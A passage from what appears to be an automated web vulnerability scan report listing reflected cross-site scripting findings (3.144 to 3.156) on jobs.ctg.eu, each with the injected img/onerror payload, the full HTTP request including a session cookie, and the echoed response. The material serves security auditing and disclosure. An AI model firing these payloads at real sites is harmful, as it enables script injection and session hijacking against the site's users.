The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f62b1"><img%20src%3da%20onerror%3dalert(1)>24eb6b0f0fc was submitted in the REST URL parameter 6. This input was echoed as f62b1"><img src=a onerror=alert(1)>24eb6b0f0fc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/themes/threesixty/js/effects.jsf62b1"><img%20src%3da%20onerror%3dalert(1)>24eb6b0f0fc?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:43:21 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:43:21 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-themes-threesixty-js-effects.jsf62b1"><img src=a onerror=alert(1)>24eb6b0f0fc not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.144. http://jobs.ctg.eu/sites/all/themes/threesixty/js/jquery.filestyle.mini.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/js/jquery.filestyle.mini.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25e58"><img%20src%3da%20onerror%3dalert(1)>c35af25cab3 was submitted in the REST URL parameter 1. This input was echoed as 25e58"><img src=a onerror=alert(1)>c35af25cab3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites25e58"><img%20src%3da%20onerror%3dalert(1)>c35af25cab3/all/themes/threesixty/js/jquery.filestyle.mini.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:38:50 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:38:51 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6759

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites25e58"><img src=a onerror=alert(1)>c35af25cab3-all-themes-threesixty-js-jquery.filestyle.mini.js not-front not-logged-in page-sites25e58img-srca-onerroralert1c35af25cab3 no-sidebars">
...[SNIP]...

3.145. http://jobs.ctg.eu/sites/all/themes/threesixty/js/jquery.filestyle.mini.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/js/jquery.filestyle.mini.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3bcef"><img%20src%3da%20onerror%3dalert(1)>3002399490 was submitted in the REST URL parameter 2. This input was echoed as 3bcef"><img src=a onerror=alert(1)>3002399490 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all3bcef"><img%20src%3da%20onerror%3dalert(1)>3002399490/themes/threesixty/js/jquery.filestyle.mini.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:40:45 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:40:46 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6720

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all3bcef"><img src=a onerror=alert(1)>3002399490-themes-threesixty-js-jquery.filestyle.mini.js not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.146. http://jobs.ctg.eu/sites/all/themes/threesixty/js/jquery.filestyle.mini.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/js/jquery.filestyle.mini.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0d47"><img%20src%3da%20onerror%3dalert(1)>eca9130c7e0 was submitted in the REST URL parameter 3. This input was echoed as a0d47"><img src=a onerror=alert(1)>eca9130c7e0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/themesa0d47"><img%20src%3da%20onerror%3dalert(1)>eca9130c7e0/threesixty/js/jquery.filestyle.mini.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:42:37 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:42:38 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6721

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-themesa0d47"><img src=a onerror=alert(1)>eca9130c7e0-threesixty-js-jquery.filestyle.mini.js not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.147. http://jobs.ctg.eu/sites/all/themes/threesixty/js/jquery.filestyle.mini.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/js/jquery.filestyle.mini.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d2bc"><img%20src%3da%20onerror%3dalert(1)>f03d1286c4 was submitted in the REST URL parameter 4. This input was echoed as 2d2bc"><img src=a onerror=alert(1)>f03d1286c4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/themes/threesixty2d2bc"><img%20src%3da%20onerror%3dalert(1)>f03d1286c4/js/jquery.filestyle.mini.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:44:05 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:44:05 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6720

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-themes-threesixty2d2bc"><img src=a onerror=alert(1)>f03d1286c4-js-jquery.filestyle.mini.js not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.148. http://jobs.ctg.eu/sites/all/themes/threesixty/js/jquery.filestyle.mini.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/js/jquery.filestyle.mini.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d066f"><img%20src%3da%20onerror%3dalert(1)>a7f78c0cf8f was submitted in the REST URL parameter 5. This input was echoed as d066f"><img src=a onerror=alert(1)>a7f78c0cf8f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/themes/threesixty/jsd066f"><img%20src%3da%20onerror%3dalert(1)>a7f78c0cf8f/jquery.filestyle.mini.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:45:14 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:45:14 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6721

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-themes-threesixty-jsd066f"><img src=a onerror=alert(1)>a7f78c0cf8f-jquery.filestyle.mini.js not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.149. http://jobs.ctg.eu/sites/all/themes/threesixty/js/jquery.filestyle.mini.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/js/jquery.filestyle.mini.js

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5178"><img%20src%3da%20onerror%3dalert(1)>0973140bc22 was submitted in the REST URL parameter 6. This input was echoed as d5178"><img src=a onerror=alert(1)>0973140bc22 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/themes/threesixty/js/jquery.filestyle.mini.jsd5178"><img%20src%3da%20onerror%3dalert(1)>0973140bc22?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:46:21 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:46:21 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6721

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-themes-threesixty-js-jquery.filestyle.mini.jsd5178"><img src=a onerror=alert(1)>0973140bc22 not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.150. http://jobs.ctg.eu/sites/all/themes/threesixty/js/swfobject.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/js/swfobject.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30ba9"><img%20src%3da%20onerror%3dalert(1)>805a34d1d8a was submitted in the REST URL parameter 1. This input was echoed as 30ba9"><img src=a onerror=alert(1)>805a34d1d8a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites30ba9"><img%20src%3da%20onerror%3dalert(1)>805a34d1d8a/all/themes/threesixty/js/swfobject.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:37:50 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:37:51 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6747

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites30ba9"><img src=a onerror=alert(1)>805a34d1d8a-all-themes-threesixty-js-swfobject.js not-front not-logged-in page-sites30ba9img-srca-onerroralert1805a34d1d8a no-sidebars">
...[SNIP]...

3.151. http://jobs.ctg.eu/sites/all/themes/threesixty/js/swfobject.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/js/swfobject.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ccd50"><img%20src%3da%20onerror%3dalert(1)>4aae54469d0 was submitted in the REST URL parameter 2. This input was echoed as ccd50"><img src=a onerror=alert(1)>4aae54469d0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/allccd50"><img%20src%3da%20onerror%3dalert(1)>4aae54469d0/themes/threesixty/js/swfobject.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:39:39 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:39:40 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6709

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-allccd50"><img src=a onerror=alert(1)>4aae54469d0-themes-threesixty-js-swfobject.js not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.152. http://jobs.ctg.eu/sites/all/themes/threesixty/js/swfobject.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/js/swfobject.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40040"><img%20src%3da%20onerror%3dalert(1)>74cc53efc7d was submitted in the REST URL parameter 3. This input was echoed as 40040"><img src=a onerror=alert(1)>74cc53efc7d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/themes40040"><img%20src%3da%20onerror%3dalert(1)>74cc53efc7d/threesixty/js/swfobject.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:41:33 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:41:34 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6709

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-themes40040"><img src=a onerror=alert(1)>74cc53efc7d-threesixty-js-swfobject.js not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.153. http://jobs.ctg.eu/sites/all/themes/threesixty/js/swfobject.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/js/swfobject.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50274"><img%20src%3da%20onerror%3dalert(1)>beb612c26a5 was submitted in the REST URL parameter 4. This input was echoed as 50274"><img src=a onerror=alert(1)>beb612c26a5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/themes/threesixty50274"><img%20src%3da%20onerror%3dalert(1)>beb612c26a5/js/swfobject.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:43:22 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:43:22 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6709

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-themes-threesixty50274"><img src=a onerror=alert(1)>beb612c26a5-js-swfobject.js not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.154. http://jobs.ctg.eu/sites/all/themes/threesixty/js/swfobject.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/js/swfobject.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ed8c"><img%20src%3da%20onerror%3dalert(1)>e9fc30c79e2 was submitted in the REST URL parameter 5. This input was echoed as 2ed8c"><img src=a onerror=alert(1)>e9fc30c79e2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/themes/threesixty/js2ed8c"><img%20src%3da%20onerror%3dalert(1)>e9fc30c79e2/swfobject.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:44:38 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:44:38 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6709

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-themes-threesixty-js2ed8c"><img src=a onerror=alert(1)>e9fc30c79e2-swfobject.js not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.155. http://jobs.ctg.eu/sites/all/themes/threesixty/js/swfobject.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/js/swfobject.js

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8edfa"><img%20src%3da%20onerror%3dalert(1)>6de297366e6 was submitted in the REST URL parameter 6. This input was echoed as 8edfa"><img src=a onerror=alert(1)>6de297366e6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/themes/threesixty/js/swfobject.js8edfa"><img%20src%3da%20onerror%3dalert(1)>6de297366e6?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:45:45 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:45:45 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6709

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-themes-threesixty-js-swfobject.js8edfa"><img src=a onerror=alert(1)>6de297366e6 not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.156. http://jobs.ctg.eu/sites/default/files/blogger/Michael_0.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/default/files/blogger/Michael_0.jpg

Issue detail

